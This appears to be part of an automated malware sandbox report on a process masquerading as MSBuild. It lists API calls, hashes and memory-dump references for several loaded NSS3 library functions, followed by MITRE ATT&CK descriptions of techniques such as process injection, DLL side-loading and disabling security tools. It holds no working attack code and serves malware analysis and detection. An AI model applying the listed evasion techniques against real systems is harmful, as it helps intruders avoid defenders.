Opcode ID: 0efbb8457ca2d32c8c5763be991d5a685945134a7909cc46123d2d37323aadbf
Instruction ID: fa764de69724c3a8e952a53262227afe52f989dfc4fad52e8c3ca96ad98f6c58
Opcode Fuzzy Hash: 0efbb8457ca2d32c8c5763be991d5a685945134a7909cc46123d2d37323aadbf
Instruction Fuzzy Hash: C421C3B1D012188BEB10DFA4D9055EEB7F4EF06208F05406AD845BB701FB31AE5ACBB9

Function 6C6C24E0 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C6C24FF
EnterCriticalSection.KERNEL32(?), ref: 6C6C250F
PR_Unlock.NSS3(?), ref: 6C6C253C
PR_SetError.NSS3(00000000,00000000), ref: 6C6C2554

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 99531d802e1f34d33dc2b0297de4b18c86279f3c3b303006e190008793d54a21
Instruction ID: 2a0d71269dcb4d5b08f25e5286cd6888aca4b75b05a9dd20ede8995113f34f2a
Opcode Fuzzy Hash: 99531d802e1f34d33dc2b0297de4b18c86279f3c3b303006e190008793d54a21
Instruction Fuzzy Hash: 6D110872E00108ABDB00AF68DC499AB7B78EF0A329F954174EC0897311EB31ED55C7E2

Function 6C6DECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C6DF0AD,6C6DF150,?,6C6DF150,?,?,?), ref: 6C6DECBA

Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C6DECD1

Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C6DED02

Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C6DED5A

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 31588aa4cf77a29865b1f12394975a65fedbc9ff22165f18d7a13baba91538c3
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: BD21D4B1D057425BE700CF25D944B52B7E4BFA9308F26C21AE81C8B662EB70E594C6D8

Function 6C70EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C6F7FFA,?,6C6F9767,?,8B7874C0,0000A48E), ref: 6C70EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C6F7FFA,?,6C6F9767,?,8B7874C0,0000A48E), ref: 6C70EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C6F7FFA,?,6C6F9767,?,8B7874C0,0000A48E), ref: 6C70EE14

Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15

memcpy.VCRUNTIME140(?,?,6C6F9767,00000000,00000000,6C6F7FFA,?,6C6F9767,?,8B7874C0,0000A48E), ref: 6C70EE33

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: fe94107a8829cf63efa36a772928672acaec4f87dfa2d70d2e976097fe70b7a2
Instruction ID: ad430f5a91fd29175d7316fc3df3885092212ba6b2ef3646b01d02276de92adb
Opcode Fuzzy Hash: fe94107a8829cf63efa36a772928672acaec4f87dfa2d70d2e976097fe70b7a2
Instruction Fuzzy Hash: DC119EF1B0570EABEB109E65DE88B06B3ECFB0435DF244535E95986A00E731E464C7E2

Function 6C6A8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C6A8DE7
EnterCriticalSection.KERNEL32 ref: 6C6A8DFC
PR_Unlock.NSS3 ref: 6C6A8E2D
PR_SetError.NSS3 ref: 6C6A8E49

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: eee8eacd59e6b3e1aba2186626fc0f9b79bd9e16771a76425ae94fb09f893ba0
Instruction ID: 990697c3d25a05d827ec3acd7fb39f5daf57a7e794fea0b5e62c0c839690f6a4
Opcode Fuzzy Hash: eee8eacd59e6b3e1aba2186626fc0f9b79bd9e16771a76425ae94fb09f893ba0
Instruction Fuzzy Hash: 8D114C71605A009BD700AF78D5885AABBF4FF09355F01496ADC88D7B00EB34E895CBD6

Function 6C72AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C715F17,?,?,?,?,?,?,?,?,6C71AAD4), ref: 6C72AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C715F17,?,?,?,?,?,?,?,?,6C71AAD4), ref: 6C72ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C71AAD4), ref: 6C72ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C71AAD4), ref: 6C72ACDB

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 2b027931975ddffff221b6b8f97e20a555782d8b19cce44ccb23b1824c28feb2
Instruction ID: deaa771a2a49725d231891784a859831685a8a50e200d78b3546366b10efe851
Opcode Fuzzy Hash: 2b027931975ddffff221b6b8f97e20a555782d8b19cce44ccb23b1824c28feb2
Instruction Fuzzy Hash: 2E015EB5701B119BE750DF29DA08753B7E8BF44669F504879D85AC3E00EB35F054CB91

Function 6C6E24E0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C6BC154,000000FF,00000000,00000000,00000000,00000000,?,?,6C6BC154,?), ref: 6C6E24FA
PORT_Alloc_Util.NSS3(00000000,?,6C6BC154,?), ref: 6C6E2509

Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6C6E2525
free.MOZGLUE(00000000), ref: 6C6E2532

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
String ID:
API String ID: 929835568-0
Opcode ID: b25fff1505689ec5f5afdb183882f6a13ad443499d5d7486918236da9926276b
Instruction ID: 8626fc94f56fd93e0525fcf26829d96197935adbd4b39434116a2071a7740eb1
Opcode Fuzzy Hash: b25fff1505689ec5f5afdb183882f6a13ad443499d5d7486918236da9926276b
Instruction Fuzzy Hash: 85F062B670A12636FA1026AA6C0DE773BADEB467F9B140272B928C66C0E951D801C1B5

Function 6C710450 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(40C70845,?,6C714710,?,000F4240,00000000), ref: 6C71046B
GetLastError.KERNEL32(?,6C714710,?,000F4240,00000000), ref: 6C710479

Part of subcall function 6C72BF80: TlsGetValue.KERNEL32(00000000,?,6C71461B,-00000004), ref: 6C72C244

PR_Unlock.NSS3(40C70845,?,6C714710,?,000F4240,00000000), ref: 6C710492
PR_SetError.NSS3(FFFFE89D,00000000,?,6C714710,?,000F4240,00000000), ref: 6C7104A5

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Error$LastMutexReleaseUnlockValue
String ID:
API String ID: 4014558462-0
Opcode ID: 9da645683e173e8453c00eb02a851ba1fbeabf6a3d051cd4a5d9674ea67bde43
Instruction ID: 80a8e8724477aa4677c251f61a45e543ce63841b5ced2e28f584caa654b5cdc0
Opcode Fuzzy Hash: 9da645683e173e8453c00eb02a851ba1fbeabf6a3d051cd4a5d9674ea67bde43
Instruction Fuzzy Hash: D9F0B470B082455BEB10AAB69E9CF1A33A99B0630EF1C8435EC1AC7E50EE25E564C651

Function 6C79CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C79CC61
free.MOZGLUE ref: 6C79CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C79CC80
free.MOZGLUE(?), ref: 6C79CC87

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 79339e7d5ff0e0694d30d5cea5effb2f38f5833468e5ba590e933bf2d48d0717
Instruction ID: a51ddec809f994fad687f11c1af9de6aea18e7928af77ed8186dfd4dd8a360eb
Opcode Fuzzy Hash: 79339e7d5ff0e0694d30d5cea5effb2f38f5833468e5ba590e933bf2d48d0717
Instruction Fuzzy Hash: 8FE030767006189BCA10EFA8DC4488677ACEF892717150565E691C3700D631F905CBA1

Function 6C6D4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6D4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C6D4DE6

Strings

%d.%d, xrefs: 6C6D4DDE

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: f0bee9b44e123ca0a154ad535393036b427e22140593c822a5098c9c06976302
Instruction ID: a27f0b29cb8684995bb061176784ef140cdcc551826caeb2bae6ae6b72913ad0
Opcode Fuzzy Hash: f0bee9b44e123ca0a154ad535393036b427e22140593c822a5098c9c06976302
Instruction Fuzzy Hash: 4C31FCB2D042186BEB109FA09C05BFF77A8DF45308F060429ED15AB781EB70AD05CBE9

Function 6C6F4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8ol,00000000,00000000,?,?,6C6F3827,?,00000000), ref: 6C6F4D0A

Part of subcall function 6C6E0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E08B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C6F4D22

Part of subcall function 6C6DFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C681A3E,00000048,00000054), ref: 6C6DFD56

Strings

'8ol, xrefs: 6C6F4D07

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8ol
API String ID: 1521942269-2428020392
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: 2f64a8f609eebc25983a0e1082c99bb21639570ee83175f43e3dbdd2e278e4ee
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: EEF09C3260112467DB104E6A9D4075336DDAB457FDF250271DD38CBB91E6B1DC02C6F5

Function 6C6E0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C6E0DF5
TlsGetValue.KERNEL32 ref: 6C6E0E2D
TlsGetValue.KERNEL32 ref: 6C6E0E58
TlsGetValue.KERNEL32 ref: 6C6E0E84

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: d8d179b2a041a6eda907c8ec9446b0d1fd0298b4bb0194298672ae045629ab6a
Instruction ID: bfb7a40ed15f9b4772ccc8ff9b1b231af3686a0d204c0b52f0c27ed41ccfd4c3
Opcode Fuzzy Hash: d8d179b2a041a6eda907c8ec9446b0d1fd0298b4bb0194298672ae045629ab6a
Instruction Fuzzy Hash: 5F31087164A3858BDB105F7CD4442A977B4BF0E308F11467AD888C7A21DF34D087DB99

Function 6C63A4E0 Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6C63A468,00000000), ref: 6C63A4F9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C63A468,00000000), ref: 6C63A51B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C63A468,?,6C63A468,00000000), ref: 6C63A545
memcpy.VCRUNTIME140(00000001,6C63A468,00000001,?,?,?,6C63A468,00000000), ref: 6C63A57D

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction ID: e20dce63bbdac6e90c8b37e193f772a6d5a4f20201ef416c3106546ad3270085
Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction Fuzzy Hash: FA1106F3D0032557DF0089F99C856EB7799AF95278F281234ED28877C1F635990882F1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

